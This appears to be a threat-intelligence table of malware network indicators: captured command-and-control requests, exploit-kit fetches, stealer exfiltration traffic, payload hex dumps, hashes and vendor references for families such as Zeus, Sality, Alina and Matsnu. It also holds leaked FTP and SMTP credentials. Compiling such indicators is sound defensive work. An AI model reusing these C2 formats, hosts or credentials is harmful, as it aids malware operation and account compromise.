Host: boyabateml.k12.tr
Cache-Control: no-cache" "Opera/9.50 (Windows NT 6.0; U; en) 
Opera/8.89 (Windows NT 6.0; U; en)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)" "176222923eaa64b43b4f75f8afaad81e 
a972f612afa03f1d0b3ffad10843e935 
4f693f209daccf69b1c785573c0002c5"
Nitedrem GET /down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393 /down.asp?action=install&u= "User-Agent: fucking
Host: bucks.onepiecedream.com:99" fucking 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Nitedrem GET /upx/kod.txt?k=123&t=7215 /kod.txt?k=123&t= "User-Agent: fucking
Host: 103.20.193.231:88" User-Agent: fucking 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Nitedrem GET ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Nitedrem GET /config.txt?&t=4593 /config.txt?&t= "User-Agent: Update
Host: in.onepiecedream.com:99
Cache-Control: no-cache" Update 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Nitedrem GET /fish.jpg?&t=4426 /fish.jpg?&t= "User-Agent: Update
Host: www.dianwofacai.com
Cache-Control: no-cache" Update 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Sality GET /?12da89=12355930 /?12da89= "User-Agent: KUKU v5.06exp =9355466431
Host: www.kjwre9fqwieluoi.info
Cache-Control: no-cache" KUKU v5.06exp =9355466431 CEAF4D9E1F408299144E75D7F29C1810 http://www.symantec.com/connect/blogs/all-one-malware-overview-sality
Sality GET /images/logos.gif?114bbc=9068000 /logos.gif? "User-Agent: KUKU v5.06exp =9355466431
Host: hayatspa.com
Cache-Control: no-cache" User-Agent: KUKU v5.06exp =9355466431 CEAF4D9E1F408299144E75D7F29C1810 http://www.symantec.com/connect/blogs/all-one-malware-overview-sality
Sality GET /setting.doc /setting.doc "Host: yahoo.com
Cache-Control: no-cache" CEAF4D9E1F408299144E75D7F29C1810 http://www.symantec.com/connect/blogs/all-one-malware-overview-sality
Torpig /Sinowal miniloader GET / "Host: 166.78.144.80
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Content-Length: 247
Connection: close" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 011C1CA6030EE091CE7C20CD3AAECFA0 http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/
Torpig /Sinowal miniloader GET /search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0 /search2?fr= "Content-Type: application/x-www-form-urlencoded
Host: annotatinggramma.info
Content-Length: 2804
Connection: Keep-Alive
Cache-Control: no-cache" 011C1CA6030EE091CE7C20CD3AAECFA0 http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/
EK Popads GET /?7d456d68729292e9843cb9dde2d2f7b4=34 /? "/?7d456d68729292e9843cb9dde2d2f7b4=34
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: xrp.8taglik.info
Connection: Keep-Alive" "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf "Accept: */*
Accept-Language: en-US
Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org
x-flash-version: 11,7,700,202
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: qkvuz.12taglik.info
Connection: Keep-Alive" na "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar "/855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07
Host: fizv.11taglik.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive" na "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in "/?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: tqhsy.8taglik.info
Connection: Keep-Alive" na "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /39ff9ff8c3b603d8eed017df64dd2799.eot "Accept: */*
Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: fizv.11taglik.info
Connection: Keep-Alive" na TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
Alina POS v5.6 POST /duck/push.php push.php "Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.6
Host: 208.98.63.226
Content-Length: 82
Cache-Control: no-cache" Alina v5.6 5A22ED78B6454E34217D07C4AF37B23B http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Alina POS v5.6 POST /adobe/version_check.php /version_check.php "Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.3
Host: 91.229.76.97
Content-Length: 2980
Cache-Control: no-cache" Alina v5.3 4c754150639aa3a86ca4d6b6342820be http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Alina POS v6.0 POST /adobe/version_check.php /version_check.php "Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v6.0
Host: 91.229.76.97
Content-Length: 3349
Cache-Control: no-cache" Alina v6.0 http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Hanove / Tourist POST /kamp.php /kamp.php "/kamp.php
Content-Type: multipart/form-data; boundary=78DDB5A902BB8FFF3F398B45BEDCD152 
User-Agent: SIMPLE
Host: http://[xxx] 
Content-Length: 501
Cache-Control: no-cache

--78DDB5A902BB8FFF3F398B45BEDCD152 
Content-Disposition: form-data; name=""uploaddir""
water/USER-6E3C3361930800270A87A2/D/ --78DDB5A902BB8FFF3F398B45BEDCD152 
Content-Disposition: form-data; name=""filename""; filename=""license_23_05_2004_08_10_00.txt"" 
Content-Type: text/plain Content-Transfer-Encoding: binary" SIMPLE 37207835e128516fe17af3dacc83a00c
Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ "00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000F0 00 00 00 00 00 00 00 03 af d7 a5 01 23 01 00 00 ........ ....#...
00000100 4a 00 00 00 78 9c 13 65 30 63 30 01 62 73 06 23 J...x..e 0c0.bs.#
00000110 06 0b 06 37 20 e9 06 84 26 0c 06 0c a4 02 00 a8 ...7 ... &......." 6178, 8089, 9696. "36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl" https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/
Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ "<removed>
00000100 9c 13 00 00 00 00 00 00 00 50 0e 00 00 4d 5a 90 ........ .P...MZ.
00000110 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 ........ ........
00000120 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 .....@.. ........
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000140 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba ........ ........
00000150 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 .....!.. L.!This
00000160 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 program cannot b
00000170 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 e run in DOS mod
00000180 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 36 31 e....$.. .....#61" 6178, 8089, 9696. "36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl" https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/
Surtr Initial GET 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ "00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
<removed>.
00000100 0a 00 00 00 64 00 00 00 00 00 00 00 00 00 ....d... ......" 6178, 8089, 9696. "36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl" https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/
Taleret GET / "/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mac.gov.skies.tw
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MCI=HHMHMBLHEHNLIOJRINRIJPRJIJ; MUID=ba2c08421000e9621000355b0000" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 443 "FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C" http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link
Taleret GET /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU- "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: tw.myblog.yahoo.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: B=8sah02d6on6k9&b=3&s=as" Mozilla/4.0 (compatible; MSIE 6.0; Win32) "FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C" http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link
Sweet Orange EK GET /in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA== /in.php?q= "/in.php?q=hPOChVXlw9QgOzotCb88uSk36elxMCiVxol9XkXXwg==
Accept: text/html, application/xhtml+xml, */*
Referer: http://techmedianet.com/server.php?fs=1&w=1280&h=800&q=hPOChVXlw9QgOzotC
b88uSk36elxMCiVxol9XkXXwg==
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: emberstat.com
Connection: Keep-Alive" User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) "http://urlquery.net/report.php?id=3120429
http://malforsec.blogspot.com/2013/03/making-orange-jam-analyzing-sweet.html"
ArcomRat / Dokstormac POST S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] "S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] 
" "
MSIE 7.0 for the file request" "1866
1888
1865
1890" "62B4C4432361C9B4B69C480C07AFA356
191FDC32304C50D9A054420E59BD21A9 
4015DD5B27EB612CA5DC320033E284C5" "http://www.threatexpert.com/report.aspx?md5=62b4c4432361c9b4b69c480c07afa356
http://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99&tabid=2"
Ardamax keylogger SMTP "220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
" "220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
250-PIPELINING
250-SIZE 41697280
250-8 BITMIME
250 AUTH PLAIN LOGIN XYMCOOKIE
AUTH LOGIN
334 VXNlcm5hbWU6
bGludXgwNjQwMEB5YWhvby5jb20=
334 UGFzc3dvcmQ6
YXplcnR5LzA2
235 2.0.0 OK
MAIL FROM:" 25 E33AF9E602CBB7AC3634C2608150DD18 http://www.ardamax.com/keylogger/
Matsnu - MBR wiping ransomware POST /f44/myse.php /myse.php "/f44/myse.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: twintrade.net
Content-Length: 344
Connection: Keep-Alive
Cache-Control: no-cache

IaTAREu1TfHHoUGCS/mqKHdWfz/L0PzKX8dpzjFoUfvV37klDPOn8KhS1lUdzm/J3kyOJugD4blZFNrw6+5lERjc0hbtCne95tSSWjACXP29rvfspXWDWDxKi17NkSh2x5eCYMIRqMeV8NZhUFtptnZ/gobO3nDnW31beGzC/0X/hzUAyb2Edpy87oPb3ohAup62JPQvqzOH3KLmS/MiVHkHo7Xv3XYHkagkLVGJJrHfhFl1tXpZIf8LOCwuAtOA5FuJC+VbkAgAaYux0Uz7w9kjxL/9jNq7G+g/UMlUwCO4ppEFvmCq/Ps3ElNe7k7IrTZ+uwn6FBCihp08muLj+A==" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 1B2D2A4B97C7C2727D571BBF9376F54F http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/
Mutopy Downloader GET /d/conh11.jpg /conh11.jpg "/d/conh11.jpg
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache" User-Agent: - 80 20A6EBF61243B760DD65F897236B6AD3 http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Mutopy Downloader initial callback GET /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4 /protocol.php?p= "/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4
User-Agent: -
Host: www.wholists.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 18:56:53 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

61 ..""...+.......o...4...o...w...t...z...5...4...t...*...|...u...o...~...)...i...h...;...4...o...k.." User-Agent: - 80 20A6EBF61243B760DD65F897236B6AD3 http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Symmi Remote File Injector GET "<p>/img/seek.cgi?lin=100&db=dfs
<p>/ae1.php
<p>/ggu.php
<p>/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies" /seek.cgi?lin= /ae1.php /ggu.php "/img/seek.cgi?lin=100&db=dfs
Accept: */*
User-Agent: Mozilla/5.0
Host: seek4.run-stat.org
Connection: Keep-Alive
Cache-Control: no-cache

/ae1.php
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

/ggu.php
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache


/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies]
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: [redacted victim wordpress cms]
Content-Length: 484
Connection: Keep-Alive
Cache-Control: no-cache

lJtdmf=T2tpZzk5b2tpZ10xY29rZW1xQntjam1tLGFtbw==&evtrKd=CQRLEdhQu&miOLST=b3ZjNCxjbzIse2NqbW1mbHEsbGd2&dMXEq=PldRR1A8aXBrcXZjXW9jZmZtej4tV1FHUDwIPkxDT0c8IElwa3F2YyJPY2ZmbXogPi1MQ09HPAg%2B [snip]" User-Agent: Mozilla/5.0 7958f73daf4b84e3b00e008258ea2e7a http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Matsnu - MBR wiping ransomware GET /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP /inbox.php?ltype=ld& "/0803&loc=0x0409&os=Windows%20XP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: nvufvwieg.com
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) 1B2D2A4B97C7C2727D571BBF9376F54F http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/
Adware Hotbar POST /vic.aspx?ver=4.0.1158.0&rnd=595937 /vic.aspx?ver= "/vic.aspx?ver=4.0.1158.0&rnd=595937
Content-Type: application/x-www-form-urlencoded
Filename: gUcmpCp
User-Agent: NSIS_Inetc (Mozilla)
Host: b.compqueue.com
Content-Length: 276
Connection: Keep-Alive
Cache-Control: no-cache
epostdata=0c40ff4962816cc3e206edda1108327207ee080103baf1c6bb02c...." NSIS_Inetc (Mozilla) "e8022373bc452ab06c49752ce20c5cc2
e7f41ba37a3c57dd31de45f0c1f855a1
d689f23246bd49b01bd30b5926e992ba" http://threatcenter.crdf.fr/?More&ID=145956&D=CRDF.AdWare.AdWare.Win32.HotBar553635795
Blackhole v2 GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622 /q.php?kf= "/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622
User-Agent: Java/1.7.0_10
Host: bandirmacatiemlak.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive" User-Agent: Java/1.7.0_10
USteal.D 220---------- Welcome to Pure-FTPd ---------- "220---------- Welcome to Pure-FTPd ----------
220-You are user number 1 of 100 allowed.
220-Local time is now 14:57. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
USER 0jeck1072
331 User 0jeck1072 OK. Password required
PASS q1w2e3r433590
230-User 0jeck1072 has group access to: 1002" 21 2b796f11f15e8c73f8f69180cf74b39d http://blogs.technet.com/b/mmpc/archive/2013/05/22/how-easily-usteal-my-passwords.aspx
Hangover Smackdown Minapro GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 /snwd.php?tp= "Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 
2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wreckmove.org
Connection: Keep-Alive" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 
2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)" "02d6519b0330a34b72290845e7ed16ab
bfd2529e09932ac6ca18c3aaff55bd79" http://enterprise.norman.com/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf
Cutwail / Pushdo POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe <p>/?ptrxcz_ <p>/?xclzve_ "/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 193
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: uakron.edu
Connection: Keep-Alive
Cache-Control: no-cache

g.P#...#...#...$..5$...$...$7S.$^.3%xQf%...%.O.%...&.Md&...&;L.&U..'o.H'...'...'...(..F(..
.2..(O..(.
........\+..p,.z...u)t.?>.-.p'+.<Z+.n.+.:.+...,.9X, ..,G7.,a.
-{.<-...-...-......:...m.>" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 582de032477e099eb1024d84c73e98c1 https://www.damballa.com/downloads/r_pubs/Damballa_mv20_case_study.pdf
Mediana Proxy GET /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0 /index.htm?n "Accept: /
Accept-Language: en-us 
Pragma: no-cache 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: firewall.happytohell.com:80 
X-HOST: n763t4OPmrs6fXq7fXp7uj16e-r 
Content-Length: 0 
Proxy-Connection: Keep-Alive" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) ECA344925AA188E6A26BB4B2E09C783C
Zeus POST "<p>/orders2010.php 
<p>/busted.php" <p>/orders2010.php <p>/busted.php "Accept: /
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mugspade.ru
Content-Length: 76
Cache-Control: no-cache

bn1=WIN7PRO_X86_000_74DEB1E36522DF69_26&sk1=C15CAF65F6280F4916AB79B669689A92
===========

Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: trapbath.ru
Content-Length: 894
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) b1551c676a54e9127cd0e7ea283b92cc
Gypthoy POST /opt/mainpage.php /mainpage.php "Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: sonunigam.us
Content-Length: 281
Connection: Keep-Alive
Cache-Control: no-cache

pcname=DELLXT&note=PO&country=&user=gurutoolz0803&log=%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0AC%3A%5CWINDOWS%5Csystem32%5Ccmd.exe%0D%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0A%0D%0A" User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 3ee49121300384ff3c82eb9a1f06f288 http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS%3AWin32%2FGypthoy.A#techdetails_link
Hupigon / Graybird ........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.. ........................................;...Windows XP 5.1 (2600.Service Pack 3)................................................................$...DELLXT.............................................................................................................................. 4s.love.......HACK.. 8000 8F90057AB244BD8B612CD09F566EAC0C
Variant Letsgo / TabMsgSQL downloader (comment crew) GET /index.htm /index.htm "User-Agent: IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116)
Accept: /
Host: mickeypluto.info
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:26:41 GMT
Content-Length: 131
Content-Type: text/html
Content-Location: http://mickeypluto.info/index.htm
Last-Modified: Mon, 18 Jul 2011 08:22:34 GMT
Accept-Ranges: bytes
ETag: ""ea835d82345cc1:15b981""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 
